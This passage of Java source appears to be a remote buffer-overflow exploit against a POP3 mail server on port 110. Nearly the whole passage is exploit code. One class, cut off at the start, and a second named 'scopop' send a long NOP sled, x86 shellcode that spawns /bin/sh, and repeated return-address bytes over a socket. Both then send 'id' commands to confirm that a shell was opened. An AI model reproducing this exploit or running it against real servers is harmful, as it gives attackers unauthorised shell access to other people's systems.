char[] codez11 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez11);
char[] codez12 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez12);
char[] codez13 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez13);
char[] codez14 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez14);
char[] codez15 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez15);
char[] codez16 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez16);
char[] codez17 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez17);
char[] codez18 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez18);
char[] codez19 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez19);
char[] codez20 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez20);
char[] codez21 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez21);
char[] codez22 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez22);
char[] codez23 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez23);
char[] codez24 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez24);
char[] codez25 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez25);
char[] codez26 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez26);
char[] codez27 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez27);
char[] codez28 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez28);
char[] codez29 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez29);
char[] codez30 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez30);
char[] codez31 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez31);
char[] codez32 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez32);
char[] codez33 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez33);
char[] codez34 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez34);
char[] codez35 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez35);
char[] codez36 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez36);
char[] codez37 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez37);
char[] codez38 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez38);
char[] codez39 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez39);
char[] codez40 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez40);
char[] codez41 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez41);
char[] codez42 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez42);
char[] codez43 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez43);
char[] codez44 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez44);
char[] codez45 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez45);
char[] codez46 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez46);
char[] codez47 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez47);
char[] codez48 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez48);
char[] codez49 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez49);
char[] codez50 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez50);
char[] codez51 = { 0xeb, 0x32, 0x5e, 0x31, 0xdb, 0x89, 0x5e, 0x07, 0x89, 0x5e, 0x12, 0x89, 0x5e, 0x17, 0x88, 0x5e };
sockout.print(codez51);
char[] codez52 = { 0x1c, 0x8d, 0x1e, 0x89, 0x5e, 0x0e, 0x31, 0xc0, 0xb0, 0x3b, 0x8d, 0x7e, 0x0e, 0x89, 0xfa, 0x89 };
sockout.print(codez52);
char[] codez53 = { 0xf9, 0xbf, 0x10, 0x10, 0x10, 0x10, 0x29, 0x7e, 0xf5, 0x89, 0xcf, 0xeb, 0x01, 0xff, 0x62, 0x61 };
sockout.print(codez53);
char[] codez54 = { 0x63, 0x60, 0xeb, 0x1b, 0xe8, 0xc9, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68 };
sockout.print(codez54);
char[] codez55 = { 0xaa, 0xaa, 0xaa, 0xaa, 0xff, 0xff, 0xff, 0xbb, 0xbb, 0xbb, 0xbb, 0xcc, 0xcc, 0xcc, 0xcc, 0x9a };
sockout.print(codez55);
char[] codez56 = { 0xaa, 0xaa, 0xaa, 0xaa, 0x07, 0xaa, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez56);
char[] codez57 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez57);
char[] codez58 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez58);
char[] codez59 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez59);
char[] codez60 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez60);
char[] codez61 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez61);
char[] codez62 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez62);
char[] codez63 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez63);
char[] codez64 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez64);
char[] codez65 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez65);
char[] codez66 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez66);
char[] codez67 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez67);
char[] codez68 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez68);
char[] codez69 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez69);
char[] codez70 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez70);
char[] codez71 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez71);
char[] codez72 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez72);
char[] codez73 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez73);
char[] codez74 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf };
sockout.print(codez74);
char[] codez75 = { 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0xe0, 0xda, 0xbf, 0xef, 0x90, 0x90, 0x90 };
sockout.print(codez75);
char[] codez76 = { 0x04, 0xcd, 0x0f, 0x40, 0x02 };
sockout.print(codez76);
char[] codez77 = { 0x0a };
sockout.print(codez77);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez78 = {  };
sockout.print(codez78);
char[] codez79 = { 0x69, 0x64, 0x0a };
sockout.print(codez79);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez80 = {  };
sockout.print(codez80);
char[] codez81 = { 0x69, 0x64, 0x0a };
sockout.print(codez81);
try
{
String fuckme = sockread.readLine();
System.out.println(fuckme);
}
catch(Exception e){
}
char[] codez82 = {  };
sockout.print(codez82);
}
catch(Exception e)
{
System.out.println(e.toString());
}

}
}
class scopop
{
public scopop()
{
String host = "localhost";
InputStreamReader inread;
BufferedReader buffread;
int port = 110;
Socket sock;
InputStreamReader sockin;
String shit = null;
PrintStream sockout;
BufferedReader sockread;
try
{
sock = new Socket(host, port);
sockin = new InputStreamReader(sock.getInputStream());
sockread = new BufferedReader(sockin);
shit = sockread.readLine();
System.out.println(shit);
sockout = new PrintStream(sock.getOutputStream());
char[] codez1 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez1);
char[] codez2 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez2);
char[] codez3 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez3);
char[] codez4 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez4);
char[] codez5 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez5);
char[] codez6 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez6);
char[] codez7 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez7);
char[] codez8 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez8);
char[] codez9 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez9);
char[] codez10 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez10);
char[] codez11 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez11);
char[] codez12 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez12);
char[] codez13 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez13);
char[] codez14 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez14);
char[] codez15 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez15);
char[] codez16 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez16);
char[] codez17 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez17);
char[] codez18 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez18);
char[] codez19 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez19);
char[] codez20 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez20);
char[] codez21 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez21);
char[] codez22 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez22);
char[] codez23 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez23);
char[] codez24 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez24);
char[] codez25 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez25);
char[] codez26 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez26);
char[] codez27 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez27);
char[] codez28 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez28);
char[] codez29 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez29);
char[] codez30 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez30);
char[] codez31 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez31);
char[] codez32 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez32);
char[] codez33 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez33);
char[] codez34 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez34);
char[] codez35 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez35);
char[] codez36 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez36);
char[] codez37 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez37);
char[] codez38 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez38);
char[] codez39 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez39);
char[] codez40 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez40);
char[] codez41 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez41);
char[] codez42 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez42);
char[] codez43 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez43);
char[] codez44 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez44);
char[] codez45 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez45);
char[] codez46 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez46);
char[] codez47 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez47);
char[] codez48 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez48);
char[] codez49 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez49);
char[] codez50 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez50);
char[] codez51 = { 0xeb, 0x32, 0x5e, 0x31, 0xdb, 0x89, 0x5e, 0x07, 0x89, 0x5e, 0x12, 0x89, 0x5e, 0x17, 0x88, 0x5e };
sockout.print(codez51);
char[] codez52 = { 0x1c, 0x8d, 0x16, 0x89, 0x56, 0x0e, 0x31, 0xc0, 0xb0, 0x3b, 0x8d, 0x7e, 0x12, 0x89, 0xf9, 0x89 };
sockout.print(codez52);
char[] codez53 = { 0xf9, 0xbf, 0x10, 0x10, 0x10, 0x10, 0x29, 0x7e, 0xf5, 0x89, 0xcf, 0xeb, 0x01, 0xff, 0x63, 0x61 };
sockout.print(codez53);
char[] codez54 = { 0x62, 0x62, 0xeb, 0x1b, 0xe8, 0xc9, 0xff, 0xff, 0xff, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68 };
sockout.print(codez54);
char[] codez55 = { 0xaa, 0xaa, 0xaa, 0xaa, 0xff, 0xff, 0xff, 0xbb, 0xbb, 0xbb, 0xbb, 0xcc, 0xcc, 0xcc, 0xcc, 0x9a };
sockout.print(codez55);
char[] codez56 = { 0xaa, 0xaa, 0xaa, 0xaa, 0x07, 0xaa, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 };
sockout.print(codez56);
char[] codez57 = { 0x90, 0x90, 0x90, 0x90, 0x90, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez57);
char[] codez58 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez58);
char[] codez59 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez59);
char[] codez60 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez60);
char[] codez61 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez61);
char[] codez62 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez62);
char[] codez63 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez63);
char[] codez64 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez64);
char[] codez65 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez65);
char[] codez66 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez66);
char[] codez67 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez67);
char[] codez68 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez68);
char[] codez69 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez69);
char[] codez70 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez70);
char[] codez71 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez71);
char[] codez72 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez72);
char[] codez73 = { 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04, 0x08, 0xb4, 0x74, 0x04 };
sockout.print(codez73);
